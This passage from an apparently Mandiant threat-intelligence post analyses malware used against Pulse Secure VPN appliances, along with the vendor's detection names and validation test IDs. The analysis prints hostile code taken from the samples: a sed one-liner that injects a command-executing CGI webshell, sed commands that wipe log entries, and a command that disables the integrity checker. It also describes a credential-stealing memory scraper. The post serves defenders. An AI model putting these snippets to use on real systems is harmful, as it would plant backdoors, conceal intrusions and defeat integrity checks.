DSUpgade.pm to host their patch logic as it is a core file in the system upgrade procedure, ensuring the patch is during updates. The patcher modifies content in /tmp/data as this directory holds the extracted upgrade image the newly upgraded system will boot into. This results in a persistence mechanism which allows the attacker to maintain access to the system across updates.</p> <p>my $cmd_x=&quot;sed -i &#39;/echo_console \&quot;Saving package\&quot;/i(    sed -i \\\&#39;/main();\\\$/cif(CGI::param(\\\\\&quot;id\\\\\&quot;)){        print \\\\\&quot;Cache-Control: no-cache\\\\\\\\n\\\\\&quot;;        print \\\\\&quot;Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\&quot;;        my \\\\\$na=CGI::param(\\\\\&quot;id\\\\\&quot;);        system(\\\\\&quot;\\\\\$na\\\&quot;);    } else{        &amp;main();    }\\\&#39; /tmp/data/root$cgi_p;    cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;    cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)&#39;/pkg/do-install&quot;;</p> <p>The patcher also performs additional shell commands for unpacking a compressed package:</p> <p>system("/bin/mount -o remount,rw /dev/root /");system("/bin/tar", "-xzf", "/tmp/new-pack.tgz", "-C", "/tmp","./installer");system("cp -f /tmp/installer/do-install /pkg/");system("cp -f /tmp/installer/VERSION /pkg/");system("cp -f /tmp/installer/sysboot-shlib /pkg/");system("cp -f /tmp/installer/losetup /pkg/");</p> <h5>PACEMAKER</h5> <p>The file memread (SHA256: 68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2) is a credential stealer. The sample has the usage information:</p> <p>Usage: memread [-t time(minute)] [-m size(MB)] [-s sleep_interval(second)]</p> <p>The sample starts by setting an alarm that kills the application after a configurable number of minutes, 14 by default. It then enters a loop which reads /proc/ entries every 2 seconds looking for a target application, this interval is also configurable. The target is found by opening /proc/&lt;process_name&gt;/cmdline for each entry in the folder and then reading this file looking for the string dswsd within the command line. Once found the target application&#39;s proc/&lt;target_pid&gt;/mem is opened, the process is attached to with PTRACE, then memory read in chunks up to 512 bytes in size. For each chunk, the string 20 30 20 0A 00 ( 0 \n) is searched for as a needle. If found the sample splits the data by first space, then a dash -. Two dashes are expected to be found, and these are immediately converted into hex numbers, example form: -&lt;number&gt;. If the second number minus the first is &gt; 8191 the sample reads the data starting at the file offset of the first number, up to a size specified by second number minus first number.</p> <p>Once the sample has read the process memory and found all memory data of interest the sample detaches PTRACE then the sample begins memory scanning the copied data. The sample tries to locate a sequence of 'flags' in memory one by one to locate what seem to be information the attacker wishes to steal. This information is not known, nor is the structure of it. The sequences scanned for generally have start and end scan sequences which in order scanned for, are:</p> <p>USER_START_FLAG: 3C 05 08 75 73 65 72 4E 61 6D 65 05 01 3E 05 00USER_END_FLAG: 3C 2F 05 08 75 73 65 72 4E 61 6D 65 05 01 3E 00PASSWORD_START_FLAG: 3C 05 08 70 61 73 73 77 6F 72 64 05 01 3E 00PASSWORD_END_FLAG: 3C 2F 05 08 70 61 73 73 77 6F 72 64 05 01 3E 00AUTHNUM_START_FLAG: 3C 05 0A 61 75 74 68 4E 75 6D 62 65 72 05 01 3E 00AUTHNUM_END_FLAG: 3C 2F 05 0A 61 75 74 68 4E 75 6D 62 65 72 05 01 3E 00</p> <p>If all these sequences are found, the data between the start and end is extracted and eventually formatted and written to the file /tmp/dsserver-check.statementcounters. The approximate format of this data is:</p> <p>Name:&lt;username&gt; || Pwd:&lt;password&gt; || AuthNum:&lt;authnumber&gt;\n</p> <p>The sample replaces the following URL encoded values with their ascii representation for the password:</p> <p>&amp;amp; -&gt;  &amp;&amp;lt;  -&gt;  &lt;&amp;gt;  -&gt;  &gt;</p> <h5>PACEMAKER Launcher Utility</h5> <p>As part of our investigation into PACEMAKER we were able to retrieve a simple bash script responsible for launching the credential stealer. The launcher script hash SHA256 4c5555955b2e6dc55f52b0c1a3326f3d07b325b112060329c503b294208960ec launches PACEMAKER from a hardcoded path with options specifying a 16MB memory read size and a memory scan interval of 2 seconds, with a variable self-kill time.</p> <p>#!/bin/bash</p> <p>/home/bin/memread -t $1 -m 16 -s 2 &amp;</p> <h5>THINBLOOD Log Wiper Utility</h5> <p>The file dsclslog with SHA256 88170125598a4fb801102ad56494a773895059ac8550a983fdd2ef429653f079 is a log wiper utility. The sample provides the usage information:</p> <p>Usage: dsclslog -f [events|access] -r [Regex1,Regex2,Regex3,...]</p> <p>The –f flag specifies if the file log.events.vc0 or log.access.vc0 within the directory /home/runtime/logs should be modified. To perform its log cleaning operations the sample first makes two copies of whichever log file was chosen, but uses .vc1 and .vc2 as the extension for the new files. The file with the .vc1 is used to search for entries that match the given entries, and the file with the .vc2 extension is used as a temporary file where the cleaned log is written. After generating both files and log cleaning is finished the sample executes the following commands via the system API to overwrite the original log with the cleaned version, then removes the intermediate:</p> <p>mv /home/runtime/logs/log.&lt;logtype&gt;.vc2/home/runtime/logs/log.&lt;logtype&gt;.vc0rm /home/runtime/logs/log.&lt;logtype&gt;.vc1</p> <h5>THINBLOOD LogWiper Utility Variant</h5> <p>The file clear_log.sh (SHA256: 1741dc0a491fcc8d078220ac9628152668d3370b92a8eae258e34ba28c6473b9) is a BASH script responsible for zeroing log lines that match a given regex pattern. The sample is similar to the compiled THINBLOOD Log Wiper but edits logs in-place with sed rather than making temporary copies. The sed commands used are:</p> <p>sed -i &quot;s/.\x00[^\x00]*&lt;regex_string&gt;[^\x00]*\x09.\x00//g&quot; /data/runtime/logs/&lt;logfile&gt;</p> <p>sed -i &quot;s/\x&lt;hex_char&gt;\x00[^\x00]*$2[^\x00]*\x09\x&lt;hex_char&gt;\x00//g&quot; /data/runtime/logs/&lt;logfile&gt;</p> <p>The sample embeds the usage information:</p> <p>usage: /home/bin/bash clear_log.sh [logfile] [keyword(regex)]</p> <h5>LOCKPICK</h5> <p>The file libcrypto.so (SHA256: 2610d0372e0e107053bc001d278ef71f08562e5610691f18b978123c499a74d8) is a shared object containing cryptographic logic from openssl. The sample contains a modification to the routine bnrand_range that breaks the security of the random numbers generated. There are three paths in this routine for generating a random big number between a given range. The first case is unmodified and generates a zeroed big number, the other two cases are patched so that a constant value overwrites the generated random value and always returns success. This breaks the random number generation by replacing it with a value the attacker knows in all cases.</p> <h5>LOCKPICK Patcher</h5> <p>The file with the hash b990f79ce80c24625c97810cb8f161eafdcb10f1b8d9d538df4ca9be387c35e4 is a patcher utility responsible for inserting the malicious logic known as LOCKPICK. The patcher starts by running sed on the integrity checker script built into the appliance to insert an early exit routine. This is inserted by the command sed -i '12aexit 0' /home/bin/check_integrity.sh which when applied causes this script to exit without performing its intended checks. After this the sample uses python file read/write APIs to insert long strings of assembly that represent the logic known as LOCKPICK. This file is different from the other patchers we’ve identified in that it is python and specifically targets system integrity routines.</p> <h4>Detecting the Techniques</h4> <p>The following table contains specific FireEye product detection names for the malware families associated with the exploitation of Pulse Secure VPN device.</p> <p> </p> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"><table border="1" style="border-collapse:collapse;width:100%"> <tbody> <tr> <td style="width:6.72632%"> <p><strong>Platform(s) </strong></p> </td> <td style="width:93.2945%"> <p><strong>Detection Name </strong></p> </td> </tr> <tr> <td style="width:6.72632%"> <p>Network Security </p> <p>Email Security </p> <p>Detection On Demand </p> <p>Malware File Scanning </p> <p>Malware File Storage Scanning </p> <p> </p> </td> <td style="width:93.2945%"> <p>FE_APT_Webshell_PL_HARDPULSE_1FEC_APT_Webshell_PL_HARDPULSE_1APT.Webshell.PL.HARDPULSE</p> <p>FE_APT_Trojan_PL_PULSEJUMP_1FEC_APT_Trojan_PL_PULSEJUMP_1FE_Trojan_PL_Generic_1</p> <p>FE_APT_Trojan_PL_RADIALPULSE_1FEC_APT_Trojan_PL_RADIALPULSE_1FE_APT_Trojan_PL_RADIALPULSE_2FE_APT_Trojan_PL_RADIALPULSE_3FEC_APT_Trojan_PL_RADIALPULSE_2FE_APT_Trojan_PL_RADIALPULSE_4FEC_APT_Trojan_PL_RADIALPULSE_3FE_APT_Trojan_PL_RADIALPULSE_5FE_APT_Tool_SH_RADIALPULSE_1FEC_APT_Tool_SH_RADIALPULSE_1</p> <p>FE_APT_Trojan_Linux32_PACEMAKER_1FE_APT_Trojan_Linux_PACEMAKER_1</p> <p>FE_APT_Backdoor_Linux32_SLOWPULSE_1FE_APT_Backdoor_Linux32_SLOWPULSE_2 FE_APT_Trojan_Linux32_SLOWPULSE_1 FE_APT_Tool_Linux32_SLOWPULSE_1</p> <p>FE_APT_Webshell_PL_STEADYPULSE_1 FEC_APT_Webshell_PL_STEADYPULSE_1 APT.Webshell.PL.STEADYPULSE</p> <p>FE_APT_Trojan_Linux32_LOCKPICK_1</p> <p>FE_Webshell_PL_ATRIUM_1 FEC_Webshell_PL_ATRIUM_1FE_Trojan_SH_ATRIUM_1</p> <p>FE_APT_Webshell_PL_SLIGHTPULSE_1FEC_APT_Webshell_PL_SLIGHTPULSE_1APT.Webshell.PL.SLIGHTPULSE</p> <p>FE_APT_Webshell_PL_PULSECHECK_1FEC_APT_Webshell_PL_PULSECHECK_1</p> <p>FE_APT_Tool_Linux32_THINBLOOD_1 FE_APT_Tool_Linux_THINBLOOD_1      FE_APT_Tool_SH_THINBLOOD_1 FEC_APT_Tool_SH_THINBLOOD_1APT.Tool.Linux.THINBLOOD.MVX</p> <p>FE_APT_Trojan_PL_QUIETPULSE_1FEC_APT_Trojan_PL_QUIETPULSE_1 FE_Trojan_SH_Generic_2 FEC_Trojan_SH_Generic_3</p> <p>Suspicious Pulse Secure HTTP request (IPS)</p> </td> </tr> <tr> <td style="width:6.72632%"> <p>Endpoint Security </p> </td> <td style="width:93.2945%"> <p>Real-Time (IOC)</p> <ul> <li>SLOWPULSE (BACKDOOR)</li> <li>PACEMAKER (LAUNCHER)</li> <li>THINBLOOD (UTILITY)</li> </ul> </td> </tr> <tr> <td style="width:6.72632%"> <p>Helix</p> </td> <td style="width:93.2945%"> <p>VPN ANALYTICS [Abnormal Logon]EXPLOIT - SONICWALL ES [CVE-2021-20021 Attempt] EXPLOIT - SONICWALL ES [CVE-2021-20021 Success]EXPLOIT - SONICWALL ES [CVE-2021-20023 Attempt]EXPLOIT - SONICWALL ES [CVE-2021-20023 Success]</p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> <h4>Mandiant Security Validation Actions</h4> <p>Organizations can validate their security controls using the following actions with <a href="https://www.mandiant.com/advantage/security-validation" rel="noopener" target="_blank" title="https://www.fireeye.com/mandiant/security-validation.html">Mandiant Security Validation</a>.</p> <p> </p> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"><table border="1" style="border-collapse:collapse;width:100%"> <tbody> <tr> <td style="width:47.0588%"> <p><strong>VID</strong> </p> </td> <td style="width:52.9412%"> <p><strong>Title</strong> </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-596 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - SLOWPULSE, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-597 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - SLOWPULSE, Download, Variant #2 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-598 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - SLOWPULSE, Download, Variant #3 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-599 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - SLOWPULSE, Download, Variant #4 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-600 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - SLOWPULSE, Download, Variant #5 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-601 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - SLOWPULSE, Download, Variant #6 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-602 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - SLOWPULSE, Download, Variant #7 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-604 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - Pulse Secure Vulnerability, Utility, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-605 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - RADIALPULSE, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-606 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - PULSEJUMP, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-607 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - HARDPULSE, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-608 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - SLIGHTPULSE, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-609 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - LOCKPICK, Patcher, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-610 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - LOCKPICK, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-611 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - ATRIUM, Patcher, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-612 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - PACEMAKER, Launcher, Download, Variant #1</p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-613 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - PACEMAKER, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-614 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - QUIETPULSE Utility, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-615 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - QUIETPULSE, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-616 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - STEADYPULSE, Download, Variant #2 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-617 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - STEADYPULSE, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-618 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - ATRIUM, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-619 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - THINBLOOD, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-620 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - THINBLOOD, Download, Variant #2 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-621 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - PULSECHECK, Download, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A101-622 </p> </td> <td style="width:52.9412%"> <p>Malicious File Transfer - PULSECHECK, Download, Variant #2 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A104-757 </p> </td> <td style="width:52.9412%"> <p>Host CLI - QUIETPULSE Utility, Check, Variant #1 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A104-758 </p> </td> <td style="width:52.9412%"> <p>Host CLI - QUIETPULSE Utility, Check, Variant #2 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A104-759 </p> </td> <td style="width:52.9412%"> <p>Host CLI - QUIETPULSE Utility, Check, Variant #3 </p> </td> </tr> <tr> <td style="width:47.0588%"> <p>A104-760 </p> </td> <td style="width:52.9412%"> <p>Host CLI - QUIETPULSE Utility, Check, Variant #4 </p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> <h4>Acknowledgements</h4> <p>Mandiant would like to thank the Stroz Friedberg DFIR and Security Testing teams for their collaboration with the analysis and research. The team would also like to thank Joshua Villanueva, Regina Elwell, Jonathan Lepore, Dimiter Andonov, Josh Triplett, Jacob Thompson and Michael Dockry for their hard work in analysis and blog content.</p></span></section><section class="kcBhad"><section class="Fabbec"><span class="WrMNjb">Posted in</span><ul class="FzXI4e"><li class="I4B51b"><a href="https://cloud.google.com/blog/topics/threat-intelligence" track-metadata-position="body"track-metadata-eventdetail="cloud.google.com/blog/topics/threat-intelligence"track-metadata-module="tag list"track-metadata-module_headline="posted in">Threat Intelligence</a></li><li class="I4B51b"><a href="https://cloud.google.com/blog/products/identity-security" track-metadata-position="body"track-metadata-eventdetail="cloud.google.com/blog/products/identity-security"track-metadata-module="tag list"track-metadata-module_headline="posted in">Security &amp; Identity</a></li></ul></section></section></div></div></div></div></div><section class="nRhiJb-DARUcf " track-metadata-module="related articles" track-metadata-module_headline="related articles"><div class="nRhiJb-DbgRPb-c5RTEf-ma6Yeb nRhiJb-DbgRPb-wNfPc-cGMI2b"><h5 class="Qwf2Db-MnozTc Qwf2Db-MnozTc-OWXEXe-MnozTc-wNfPc nRhiJb-DbgRPb-II5mzb-cGMI2b">Related articles</h5><section class="m9cUGf HGev3 nJD2Qe nRhiJb-ObfsIf"><div class=" QaGyvd nRhiJb-kR0ZEf-OWXEXe-GV1x9e-c5RTEf nRhiJb-kR0ZEf-OWXEXe-GV1x9e-qWD73c-V2iZpe"><div class="mA0uBe"><a href="https://cloud.google.com/blog/topics/threat-intelligence/glassbridge-pro-prc-influence-operations" class="lD2oe" track-name="seeing through a glassbridge: understanding the digital marketing ecosystem spreading pro-prc influence operations"track-type="card"track-metadata-eventdetail="cloud.google.com/blog/topics/threat-intelligence/glassbridge-pro-prc-influence-operations"><div class="AhkbS "><div class="hqnDEf"><section class="PBkdHd "><img class=" D5RK8d" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png" loading="lazy"/></section></div><div class="JUOx5b"><div class="Qwf2Db-MnozTc Qwf2Db-MnozTc-OWXEXe-MnozTc-qWD73c nRhiJb-DbgRPb-c5RTEf-ma6Yeb nRhiJb-BFbNVe-r8s4j-bMElCd FI6Gl nRhiJb-fmcmS-oXtfBe" track-name="threat intelligence"track-type="tag">Threat Intelligence</div><h3 class="Qwf2Db-MnozTc HGFKtc Qwf2Db-MnozTc-OWXEXe-MnozTc-wNfPc">Seeing Through a GLASSBRIDGE: Understanding the Digital Marketing Ecosystem Spreading Pro-PRC Influence Operations</h3><p class="nRhiJb-cHYyed dTIXyb nRhiJb-DbgRPb-R6PoUb-ma6Yeb">By Google Threat Intelligence Group • 6-minute read</p></div></div></a></div></div><div class=" QaGyvd nRhiJb-kR0ZEf-OWXEXe-GV1x9e-c5RTEf nRhiJb-kR0ZEf-OWXEXe-GV1x9e-qWD73c-V2iZpe"><div class="mA0uBe"><a href="https://cloud.google.com/blog/topics/threat-intelligence/gemini-malware-analysis-code-interpreter-threat-intelligence" class="lD2oe" track-name="empowering gemini for malware analysis with code interpreter and google threat intelligence"track-type="card"track-metadata-eventdetail="cloud.google.com/blog/topics/threat-intelligence/gemini-malware-analysis-code-interpreter-threat-intelligence"><div class="AhkbS "><div class="hqnDEf"><section class="PBkdHd "><img class=" D5RK8d" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png" loading="lazy"/></section></div><div class="JUOx5b"><div class="Qwf2Db-MnozTc Qwf2Db-MnozTc-OWXEXe-MnozTc-qWD73c nRhiJb-DbgRPb-c5RTEf-ma6Yeb nRhiJb-BFbNVe-r8s4j-bMElCd FI6Gl nRhiJb-fmcmS-oXtfBe" track-name="threat intelligence"track-type="tag">Threat Intelligence</div><h3 class="Qwf2Db-MnozTc HGFKtc Qwf2Db-MnozTc-OWXEXe-MnozTc-wNfPc">Empowering Gemini for Malware Analysis with Code Interpreter and Google Threat Intelligence</h3><p class="nRhiJb-cHYyed dTIXyb nRhiJb-DbgRPb-R6PoUb-ma6Yeb">By Bernardo Quintero • 6-minute read</p></div></div></a></div></div><div class=" QaGyvd nRhiJb-kR0ZEf-OWXEXe-GV1x9e-c5RTEf nRhiJb-kR0ZEf-OWXEXe-GV1x9e-qWD73c-V2iZpe"><div class="mA0uBe"><a href="https://cloud.google.com/blog/topics/threat-intelligence/ai-enhancing-your-adversarial-emulation" class="lD2oe" track-name="pirates in the data sea: ai enhancing your adversarial emulation"track-type="card"track-metadata-eventdetail="cloud.google.com/blog/topics/threat-intelligence/ai-enhancing-your-adversarial-emulation"><div class="AhkbS "><div class="hqnDEf"><section class="PBkdHd "><img class=" D5RK8d" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png" loading="lazy"/></section></div><div class="JUOx5b"><div class="Qwf2Db-MnozTc Qwf2Db-MnozTc-OWXEXe-MnozTc-qWD73c nRhiJb-DbgRPb-c5RTEf-ma6Yeb nRhiJb-BFbNVe-r8s4j-bMElCd FI6Gl nRhiJb-fmcmS-oXtfBe" track-name="threat intelligence"track-type="tag">Threat Intelligence</div><h3 class="Qwf2Db-MnozTc HGFKtc Qwf2Db-MnozTc-OWXEXe-MnozTc-wNfPc">Pirates in the Data Sea: AI Enhancing Your Adversarial Emulation</h3><p class="nRhiJb-cHYyed dTIXyb nRhiJb-DbgRPb-R6PoUb-ma6Yeb">By Mandiant • 25-minute read</p></div></div></a></div></div><div class=" QaGyvd nRhiJb-kR0ZEf-OWXEXe-GV1x9e-c5RTEf nRhiJb-kR0ZEf-OWXEXe-GV1x9e-qWD73c-V2iZpe"><div class="mA0uBe"><a href="https://cloud.google.com/blog/topics/threat-intelligence/cybersecurity-forecast-2025" class="lD2oe" track-name="emerging threats: cybersecurity forecast 2025"track-type="card"track-metadata-eventdetail="cloud.google.com/blog/topics/threat-intelligence/cybersecurity-forecast-2025"><div class="AhkbS "><div class="hqnDEf"><section class="PBkdHd "><img class=" D5RK8d" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png" loading="lazy"/></section></div><div class="JUOx5b"><div class="Qwf2Db-MnozTc Qwf2Db-MnozTc-OWXEXe-MnozTc-qWD73c nRhiJb-DbgRPb-c5RTEf-ma6Yeb nRhiJb-BFbNVe-r8s4j-bMElCd FI6Gl nRhiJb-fmcmS-oXtfBe" track-name="threat intelligence"track-type="tag">Threat Intelligence</div><h3 class="Qwf2Db-MnozTc HGFKtc Qwf2Db-MnozTc-OWXEXe-MnozTc-wNfPc">Emerging Threats: Cybersecurity Forecast 2025</h3><p class="nRhiJb-cHYyed dTIXyb nRhiJb-DbgRPb-R6PoUb-ma6Yeb">By Adam Greenberg • 3-minute read</p></div></div></a></div></div></section></div></section></article></div></div><c-data id="i1" jsdata=" n2jFB;_;1"></c-data></c-wiz><script aria-hidden="true" nonce="-49Bz_4wsckd3k4vDG-wCQ">window.wiz_progress&&window.wiz_progress();window.wiz_tick&&window.wiz_tick('zPZHOe');</script><script nonce="-49Bz_4wsckd3k4vDG-wCQ">(function(){'use strict';var c=window,d=[];c.aft_counter=d;var e=[],f=0;function _recordIsAboveFold(a){if(!c._isLazyImage(a)&&!a.hasAttribute("data-noaft")&&a.src){var b=(c._isVisible||function(){})(c.document,a);a.setAttribute("data-atf",b);b&&(e.indexOf(a)!==-1||d.indexOf(a)!==-1||a.complete||d.push(a),a.hasAttribute("data-iml")&&(a=Number(a.getAttribute("data-iml")),a>f&&(f=a)))}} c.initAft=function(){f=0;e=Array.prototype.slice.call(document.getElementsByTagName("img")).filter(function(a){return!!a.getAttribute("data-iml")});[].forEach.call(document.getElementsByTagName("img"),function(a){try{_recordIsAboveFold(a)}catch(b){throw b.message=a.hasAttribute("data-iid")?b.message+"\nrecordIsAboveFold error for defer inlined image":b.message+("\nrecordIsAboveFold error for img element with <src: "+a.src+">"),b;}});if(d.length===0)c.onaft(f)};}).call(this); initAft()</script><script id="_ij" nonce="-49Bz_4wsckd3k4vDG-wCQ">window.IJ_values = [[null,null,"",false,null,null,true,false],'0','https:\/\/cloud.google.com\/blog\/',["cloudblog","topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day",["en","de","fr","ko","ja"],"en",null,"https://cloud.google.com/blog","blog_article","cloud.google.com",["https://console.cloud.google.com/freetrial/","https://cloud.google.com/contact/","https://cloud.google.com/","https://cloud.google.com/blog","https://cloud.google.com/","https://www.google.com/","https://cloud.google.com/products/","https://about.google.com/products/","https://about.google/intl/en/","https://support.google.com"],["googlecloud","googlecloud","showcase/google-cloud","googlecloud/","googlecloud/"],true], null ,'boq_cloudx-web-blog-uiserver_20241121.08_p0','cloud.google.com',["SG",1],[[["bigquery_ftv",["bigquery_ftv",[["control",["control",[97716263,97716264],["/bigquery"]]],["variantA",["variantA",[97716265,97716266],["/bigquery"]]],["variantB",["variantB",[97716267,97716268],["/bigquery"]]],["variantC",["variantC",[97716269,97716270],["/bigquery"]]]]]],["jss",["jss",[["control",["control",[93803230,93804391],["/products/ai","/products/compute","/solutions/web-hosting"]]],["variantA",["variantA",[93803231,93804392],["/products/ai","/products/compute","/solutions/web-hosting"]]],["variantB",["variantB",[93803232,93804393],["/products/ai","/products/compute","/solutions/web-hosting"]]],["variantC",["variantC",[93803233,93804394],["/products/ai","/products/compute","/solutions/web-hosting"]]]]]]]], 0.0 ,["GTM-5CVQBG",[["en","\u202aEnglish\u202c",true,"en"],["de","\u202aDeutsch\u202c",true,"de"],["es","\u202aEspañol\u202c",true,"es"],["es-419","\u202aEspañol (Latinoamérica)\u202c",true,"es-419"],["fr","\u202aFrançais\u202c",true,"fr"],["id","\u202aIndonesia\u202c",true,"id"],["it","\u202aItaliano\u202c",true,"it"],["pt-BR","\u202aPortuguês (Brasil)\u202c",true,"pt-BR"],["zh-CN","\u202a简体中文\u202c",true,"zh-Hans"],["zh-TW","\u202a繁體中文\u202c",true,"zh-Hant"],["ja","\u202a日本語\u202c",true,"ja"],["ko","\u202a한국어\u202c",true,"ko"]],["83405","AIzaSyD3LJeW4Q6gtdgJlyeFZUp-GhpIoc6EUeg"],"en",null,null,[],[["https://cloud.google.com/innovators","https://cloud.google.com/innovators/plus/activate","https://cloud.google.com/innovators/innovatorsplus"],["https://workspace.google.com/pricing","https://www.x.com/googleworkspace","https://www.facebook.com/googleworkspace","https://www.youtube.com/channel/UCBmwzQnSoj9b6HzNmFrg_yw","https://www.instagram.com/googleworkspace","https://www.linkedin.com/showcase/googleworkspace","https://about.google/?utm_source\u003dworkspace.google.com\u0026utm_medium\u003dreferral\u0026utm_campaign\u003dgsuite-footer-en","https://about.google/products/?tip\u003dexplore","https://workspace.google.com","https://workspace.google.com/contact/?source\u003dgafb-form-globalnav-en","https://workspace.google.com/business/signup/welcome?hl\u003den\u0026source\u003dgafb-form-globalnav-en","https://workspace.google.com/blog"],["https://www.cloudskillsboost.google","https://www.cloudskillsboost.google?utm_source\u003dcgc\u0026utm_medium\u003dwebsite\u0026utm_campaign\u003devergreen","https://www.cloudskillsboost.google/subscriptions?utm_source\u003dcgc\u0026utm_medium\u003dwebsite\u0026utm_campaign\u003devergreenlaunchpromo","https://www.cloudskillsboost.google/subscriptions?utm_source\u003dcgc\u0026utm_medium\u003dwebsite\u0026utm_campaign\u003devergreen","https://www.cloudskillsboost.google/catalog?utm_source\u003dcgc\u0026utm_medium\u003dwebsite\u0026utm_campaign\u003devergreen","https://www.cloudskillsboost.google/paths?utm_source\u003dcgc\u0026utm_medium\u003dwebsite\u0026utm_campaign\u003devergreen"],["https://mapsplatform.google.com"],["https://cloud.google.com/developers","https://cloud.google.com/developers/settings?utm_source\u003dinnovators"],["https://console.cloud.google.com/freetrial","https://console.cloud.google.com/","https://console.cloud.google.com/freetrial?redirectPath\u003dhttps://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day/"],["https://aitestkitchen.withgoogle.com/signup","https://blog.google/technology/ai/join-us-in-the-ai-test-kitchen/","https://cloud.google.com/ai"],["https://googlecloudplatform.blogspot.com/","https://github.com/GoogleCloudPlatform","https://www.linkedin.com/company/google-cloud","https://twitter.com/GoogleCloud_sg","https://www.facebook.com/googlecloud","https://www.youtube.com/GoogleCloudAPAC"]],[2024,11,24],[["en","x-default"],"x-default"],[null,true],null,"/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day/?hl\u003den",["6LcsrxUqAAAAAFhpR1lXsPN2j2n